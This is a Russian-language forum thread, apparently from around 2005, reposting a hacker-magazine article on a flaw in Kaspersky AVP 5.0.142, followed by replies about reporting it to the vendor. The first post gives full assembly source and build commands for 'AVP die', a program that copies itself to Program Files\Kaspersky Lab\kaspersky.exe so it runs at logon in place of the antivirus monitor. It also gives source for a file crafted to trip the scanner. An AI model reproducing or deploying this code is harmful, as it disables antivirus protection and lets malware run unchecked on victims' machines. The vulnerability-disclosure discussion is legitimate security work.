Показано с 1 по 8 из 8.

Кое что об АVP

  1. #1
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SDA
    Регистрация
    07.01.2005
    Адрес
    Москва
    Сообщений
    7,168
    Вес репутации
    3189

    Кое что об АVP

    Была обнаружена интересная особенность реализации всеми любимого антивирусного продукта. Она заключается в том, что если при установленном анивирусном мониторе ( всё это тестировалось на AVP v. 5.0.142) создать файл в директории Program Files\Kaspersky Lab с именем kaspersky.exe, то после перезагрузки или выхода и входа в систему будет запущен наш файл. А антивирусный монитор запущен не будет.

    Не правда ли интересная особенность? Теперь немного о том как, это может быть использовано. Вот есть к примеру у нас вирус, нет не то, ... Вот есть к примеру у нас следующий false alarm или по русски - ложная тревога. По сути это обыкновенный ничем не примечательный файл, вот только на него
    ругается антивирус.

    К примеру вот такой:

    ;-8<-[false.asm]---;
    ; На этот *.com файл ругается АВП ;
    ; Это false alarm, т.к. кроме вывода строки он ничего не делает ;
    ;---;
    seg000 segment byte public &#039;CODE&#039;
    assume cs:seg000
    org 100h
    assume es:nothing, ss:nothing, ds:seg000

    public start
    start:
    push ax
    dec bx
    pop ax
    ;---;
    db 0 ;
    db 0 ;
    db 0 ;
    db 5Eh ; ^

    db 500 dup(0)

    db 80h ; А
    db 0 ;
    db 0 ;
    db 80h ; А
    db 80h ; А
    db 0 ;
    db 0 ;
    db 0 ;
    db 80h ; А
    db 0 ;
    db 80h ; А
    db 0 ;
    db 0 ;
    db 80h ; А
    db 80h ; А
    db 80h ; А
    db 80h ; А
    db 0 ;
    db 80h ; А
    db 80h ; А
    db 0 ;
    db 0A8h ; и
    db 0 ;
    ;---;
    mov ah, 9
    mov dx, offset vx_work ; "virii is work..."
    int 21h ; Выводим строку
    retn
    ;---;
    vx_work db &#039;virii is work, thx to AVP die v 0.01 by slon!$&#039;,0

    seg000 ends
    end start
    ;-8<-[false.asm]---;

    Это обыкновенный *.com файл, но если попытаться запустить его, то антивирусный монитор заругается и не даст его запустить. С одной стороны монитор прав - по контрольным суммам смахивает на вирус, но ведь не вирус ...

    А если обыкновенная программа по контрольным суммам смахивает на вирус, тогда нужно письмо писать в антивирусную контору и очень может быть, что не в одну.

    А вот если запустить следующую программу... (ниже представлен её листинг):

    ;-8<-[avp_die.asm]---;
    ; ;
    ; AVP die v 0.01 demo [ "Смерть кашпировскому Ж)" ] (x) slon 2004 ;
    ; Что делает эта программа: ;
    ; ;
    ; 1) Она автоматически загружается (вместо AVP, проверено на AVP 5.0.142) ;
    ; 2) Не даёт загрузиться AVP ;
    ; ;
    ; Использование: ;
    ; ;
    ; 1) Запустить программу ;
    ; 2) logoff/reboot/poweroff по выбору Ж) ;
    ; ;
    ;-8<-[make.bat]---;
    ; @echo off ;
    ; cls ;
    ; tasm32 /mx /m4 /z avpdie.asm ;
    ; tlink32 -x -V4.0 -Tpe -aa -c avpdie.obj,,,imp32i.lib ;
    ; del *.obj ;
    ;-8<-[make.bat]---;
    ; Собирать файл при помощи make.bat и конечно же TASM 5.0 ;
    .586
    .model flat, stdcall
    locals @@
    ;---;
    callx macro x ;
    extrn x:proc ; Макрос для упрощения
    call x ; использования WIN API
    endm ;
    .data
    ;---;
    start:
    push 0 ; Получаем
    callx GetModuleHandleA ; базу модуля

    push 500 ;
    push offset cmd_ ;
    push eax ; Узнаём имя файла из
    callx GetModuleFileNameA ; которого мы запущены

    push 500 ;
    push offset win_dir ; Получаем имя директории
    callx GetWindowsDirectoryA ; Windows

    push offset prog_ ;
    lea eax,win_dir ;
    push eax ;
    add eax,3 ;
    mov 4 ptr [eax],0 ; Готовим путь для копирования
    callx lstrcatA ; в "Program Files"

    push 1 ;
    push offset win_dir ;
    push offset cmd_ ; Копируем себя
    callx CopyFileA ; в "Program Files"

    push 0 ;
    push 0 ;
    push offset msg__ ;
    push 0 ;
    callx MessageBoxA ; Выводим красивое сообщение

    push 0 ;
    callx ExitProcess ; И завершаем нашу работу

    ;---;
    msg__ db &#039;Прощайте дядя кашпировский, AVP теперь убит!&#039;,0ah,0dh
    db &#039;AVP die v 0.01 (x) slon 2004&#039;,0

    win_dir db 500 dup(0)
    sys_dir db 500 dup(0)

    cmd_ db 500 dup(0)
    prog_ db &#039;Program Files\Kaspersky Lab\kaspersky.EXE&#039;,0
    ;---;
    .code
    nop ; Для красоты
    end start
    ;-8<-[avp_die.asm]---;

    После её работы наша ложная тревога без всяких проблем запуститься. Что говорит об ошибках в реализации данного антивирусного продукта. Смеем скромно надеяться, что данная ошибка будет в скором времени поправлена. Не очень бы хотелось встретить её в скором времени в каком-нибудь интернет червяке.
    Материал взят с сайта Журнала "Хакер".

    Я не большой специалист в этой области, но мой любимый антивирус Касперский (при всей его тормознутости), поэтому интересно, устранена ли данная ошибка в последующих версиях (честно признаюсь в лабораторию данный материал не посылал).

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для drongo
    Регистрация
    17.09.2004
    Адрес
    Israel
    Сообщений
    7,164
    Вес репутации
    994

    Re:Кое что об АVP

    решил нас подставить ;D ?

  4. #3
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для egik
    Регистрация
    30.10.2004
    Адрес
    Россия, Новороссийск
    Сообщений
    640
    Вес репутации
    83

    Re:Кое что об АVP

    1. Сейчас уже 5.0.227
    2. Там принципиально много новых изменений
    3. Чтоб это утверждать надо проверить на практике, т.к. ребята из Хакера иногда подают искаженную информацию.

  5. #4
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SDA
    Регистрация
    07.01.2005
    Адрес
    Москва
    Сообщений
    7,168
    Вес репутации
    3189

    Re:Кое что об АVP

    drongo - Никого не собирался подставлять, отправлю этот материал в лабораторию сам (если получу ответ то опубликую), просто может быть из спецов кто-то сам протестит последние версии(я думаю. что это касается и pro и рабочих станций), я уже писал, что я не специалист.

  6. #5
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для drongo
    Регистрация
    17.09.2004
    Адрес
    Israel
    Сообщений
    7,164
    Вес репутации
    994

    Re:Кое что об АVP

    sda ,я шутя ;D

  7. #6
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для egik
    Регистрация
    30.10.2004
    Адрес
    Россия, Новороссийск
    Сообщений
    640
    Вес репутации
    83

    Re:Кое что об АVP

    идея классная получишь ответ сообщи, я так spamihilator отбил, отреагировали быстро.

  8. #7
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SDA
    Регистрация
    07.01.2005
    Адрес
    Москва
    Сообщений
    7,168
    Вес репутации
    3189

    Re:Кое что об АVP

    В лабораторию отправил, у меня последняя версия рабочей станции (выделила моя контора), заодно посмотрю реакцию админа, а то они в целях антивирусной безопасности( ничего умней не придумано) убрали все внешние устройства- флоппи, сидюшники и заблокировали USB.

  9. #8
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Minos
    Регистрация
    03.10.2004
    Адрес
    Krasnodar, 23 RUS
    Сообщений
    499
    Вес репутации
    82

    Re:Кое что об АVP

    Цитата Сообщение от SDA
    В лабораторию отправил, у меня последняя версия рабочей станции (выделила моя контора), заодно посмотрю реакцию админа, а то они в целях антивирусной безопасности( ничего умней не придумано) убрали все внешние устройства- флоппи, сидюшники и заблокировали USB.
    Довольно распространенное решение в случае если не дают деньги на антивирус. Если на рабочем месте Интернета нет, ставятся вовремя заплатки и следят за порядком в сети, то защита от вирусов довольно эффективная.

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00831 seconds with 18 queries